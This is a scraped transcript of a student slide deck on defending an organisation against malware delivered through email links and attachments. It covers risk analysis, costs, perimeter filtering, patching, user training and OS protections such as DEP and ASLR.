Streeterville Group M. Aghajanian, M. Blackburn, T. Heller
description
Transcript of Streeterville Group M. Aghajanian, M. Blackburn, T. Heller
![Page 1: Streeterville Group M. Aghajanian, M. Blackburn, T. Heller](https://reader035.fdocuments.in/reader035/viewer/2022062500/56814fc8550346895dbd85f4/html5/thumbnails/1.jpg)
Streeterville GroupM. Aghajanian, M. Blackburn, T. Heller
Defending Against
Users Executing
Malware Code via Email
![Page 2: Streeterville Group M. Aghajanian, M. Blackburn, T. Heller](https://reader035.fdocuments.in/reader035/viewer/2022062500/56814fc8550346895dbd85f4/html5/thumbnails/2.jpg)
Case of Confounded Confections, Inc.
Introduction
• Ultra-secure network to protect their sweet secrets:1. Enterprise firewalls.2. Only necessary services with required
authentication.3. Tightly managed systems.
•Anomalies begin to appear.
•CIO wants to know…
![Page 3: Streeterville Group M. Aghajanian, M. Blackburn, T. Heller](https://reader035.fdocuments.in/reader035/viewer/2022062500/56814fc8550346895dbd85f4/html5/thumbnails/3.jpg)
Investigation
Why?!Why?!
![Page 4: Streeterville Group M. Aghajanian, M. Blackburn, T. Heller](https://reader035.fdocuments.in/reader035/viewer/2022062500/56814fc8550346895dbd85f4/html5/thumbnails/4.jpg)
Quick Review
Risk Analysis
• Risk analysis (quantitative)• Policy• Design• Prevention• Response or countermeasures• Implementation• Control• Rinse and repeat...
![Page 5: Streeterville Group M. Aghajanian, M. Blackburn, T. Heller](https://reader035.fdocuments.in/reader035/viewer/2022062500/56814fc8550346895dbd85f4/html5/thumbnails/5.jpg)
Classifications
• State of hosts: susceptible, infected, quarantined, recovered, transmitted, and healthy.
• Size of host population: small (binomial), large (poisson).
• Diversity of hosts (mix of operating systems)
• Weight of susceptibility
• Weight of business value
Risk Analysis
![Page 6: Streeterville Group M. Aghajanian, M. Blackburn, T. Heller](https://reader035.fdocuments.in/reader035/viewer/2022062500/56814fc8550346895dbd85f4/html5/thumbnails/6.jpg)
Risk Analysis
![Page 7: Streeterville Group M. Aghajanian, M. Blackburn, T. Heller](https://reader035.fdocuments.in/reader035/viewer/2022062500/56814fc8550346895dbd85f4/html5/thumbnails/7.jpg)
General Cost of Malware
• Paradigm shift to more indirect costs than direct costs overall.
• Largest expenses:
• Staff hours for support.• Staff hours from downtime.
• Hardware, software, vendor support and IT training.
• Legal, human resources, and training.
Risk Analysis
![Page 8: Streeterville Group M. Aghajanian, M. Blackburn, T. Heller](https://reader035.fdocuments.in/reader035/viewer/2022062500/56814fc8550346895dbd85f4/html5/thumbnails/8.jpg)
Design Solutions
• Layered schema for malware detection.
• Prevention by inspection at various points at the edge and perimeter.
• ClamAV (open source hardware solution)
• Microsoft perspective (proprietary software solution)
• Future approaches at the edge or perimeter (next sections)
Prevention at the Edge and Perimeter
![Page 9: Streeterville Group M. Aghajanian, M. Blackburn, T. Heller](https://reader035.fdocuments.in/reader035/viewer/2022062500/56814fc8550346895dbd85f4/html5/thumbnails/9.jpg)
Prevention at the Edge and Perimeter
Layered Protection Microsoft Approach
![Page 10: Streeterville Group M. Aghajanian, M. Blackburn, T. Heller](https://reader035.fdocuments.in/reader035/viewer/2022062500/56814fc8550346895dbd85f4/html5/thumbnails/10.jpg)
Exploitations
Responding to User Actions: Clicking on Links
Drive-By Downloads
o Exploit browser vulnerabilities.
JavaScript/ECMAScript
Content Parsing
o Exploit vulnerabilities in browser add-ons.
Flash
Adobe Reader
Java
![Page 11: Streeterville Group M. Aghajanian, M. Blackburn, T. Heller](https://reader035.fdocuments.in/reader035/viewer/2022062500/56814fc8550346895dbd85f4/html5/thumbnails/11.jpg)
Countermeasures
Responding to User Actions: Clicking on Links
• DNS Blacklistingo Used by spam filtering software.o Repurposed to everyday DNS.o Prevent access to sites known to host
malware.o 11.25¢ per user/year.
• SSL Proxy with malcode detectiono Prevent all malcode delivery.o Including within encrypted sessions.
![Page 12: Streeterville Group M. Aghajanian, M. Blackburn, T. Heller](https://reader035.fdocuments.in/reader035/viewer/2022062500/56814fc8550346895dbd85f4/html5/thumbnails/12.jpg)
Prevention—Human Factor
Responding to User Actions: Clicking on Links
• User Trainingo Detect Suspicious emails.o Close Browser if concerned.
• Acceptable Use Policyo Discourage promiscuous behavior.o "Scare tactic" heightens stakes.
• Ongoing Communicationo Ongoing remediation costs = foregone
benefits.o Reinforce desired behavior.
![Page 13: Streeterville Group M. Aghajanian, M. Blackburn, T. Heller](https://reader035.fdocuments.in/reader035/viewer/2022062500/56814fc8550346895dbd85f4/html5/thumbnails/13.jpg)
Mitigation—Technical Approaches
Responding to User Actions: Clicking on Links
• Application Selectiono Remove Adobe Reader: 55% of all attacks.o Remove IE6, 5% of all attacks.
• Update policieso Use Microsoft Group Policy
Update MS products automatically.o Communicate & inform userso Perform software audits
Not feasible in decentralized networks.
![Page 14: Streeterville Group M. Aghajanian, M. Blackburn, T. Heller](https://reader035.fdocuments.in/reader035/viewer/2022062500/56814fc8550346895dbd85f4/html5/thumbnails/14.jpg)
Mitigation—Human Factor
Responding to User Actions: Clicking on Links
• User cooperation
o Accept new updates
o Don't install unknown plugins
• Vendor support
o Push updates to all clients
o Centralized patch level monitoring
o Create vendor compliance standards
![Page 15: Streeterville Group M. Aghajanian, M. Blackburn, T. Heller](https://reader035.fdocuments.in/reader035/viewer/2022062500/56814fc8550346895dbd85f4/html5/thumbnails/15.jpg)
Antivirus Signatures
Responding to User Actions: Opening Attachments
o Typical approachBit-by-bit signatures (a.k.a. "hash")
o New approachBehavioral signature
o InfluenceScript Kiddies
o Policy and enforcementAdditional software may be requiredPerformance hitInstrumentation, Legacy systems
![Page 16: Streeterville Group M. Aghajanian, M. Blackburn, T. Heller](https://reader035.fdocuments.in/reader035/viewer/2022062500/56814fc8550346895dbd85f4/html5/thumbnails/16.jpg)
Policies and Enforcement
Responding to User Actions: Opening Attachments
• Antivirus/OS update policies and procedureso Responses to malware/vulnerabilities, a.k.a.
Patcheso Admins: greater freedom/power or computer
securityo If users choose when to update...o If admin chooses when to update...o "Managed" antivirus software
Shows who is doing what: Privacy issues• Distributed Support System
o Typical of universitieso Policies and enforcement up to non-IT personnel
![Page 17: Streeterville Group M. Aghajanian, M. Blackburn, T. Heller](https://reader035.fdocuments.in/reader035/viewer/2022062500/56814fc8550346895dbd85f4/html5/thumbnails/17.jpg)
OS Countermeasures
Responding to User Actions: Opening Attachments
• User privilege managemento Usually centralized
Environment and staff affect leniencyResearch environment requires more user privilegesLess IT staff requires more user privileges
Requirements, Reactions & RiskUsers have different tasks, downtime, productivity requirements
• Vendor/Instrumentation/Legacy computerso Limited support, no software patching (Vendor not liable)o Various versions of antivirus softwareo User POV
Updating is confusing, lengthy, slower computer and system re-boot
![Page 18: Streeterville Group M. Aghajanian, M. Blackburn, T. Heller](https://reader035.fdocuments.in/reader035/viewer/2022062500/56814fc8550346895dbd85f4/html5/thumbnails/18.jpg)
Execution and Service Management
Responding to User Actions: Opening Attachments
• OS's require password authorization before executiono Protects against "accidentally" installing unwanted
softwareo Users can enter password and move on
• DEP & ASLRo Windows XP SP2, Mac OS Xo Effective as individual solutiono Exploits written for IE8 and Firefox (Mac & Win)o Defense-in-Depth: Makes exploits slower
Layering defenses: more obstacles, more opportunities
![Page 19: Streeterville Group M. Aghajanian, M. Blackburn, T. Heller](https://reader035.fdocuments.in/reader035/viewer/2022062500/56814fc8550346895dbd85f4/html5/thumbnails/19.jpg)
Future Approaches
• Network level sandboxo Users adept to waiting for emails
• Deep-scanning email clientso Number of cores/cpu's growing & Privacy issues
• Research: Extent of malware coders sharing/upgrading malware
• Executable signatures• Non IT Policies
o High level policies (HIPPA, SOX)Cause more IT support funding and detailForce everyone to abide (legal consequences)
• Northwestern Universityo Proactive policies, training
Responding to User Actions: Opening Attachments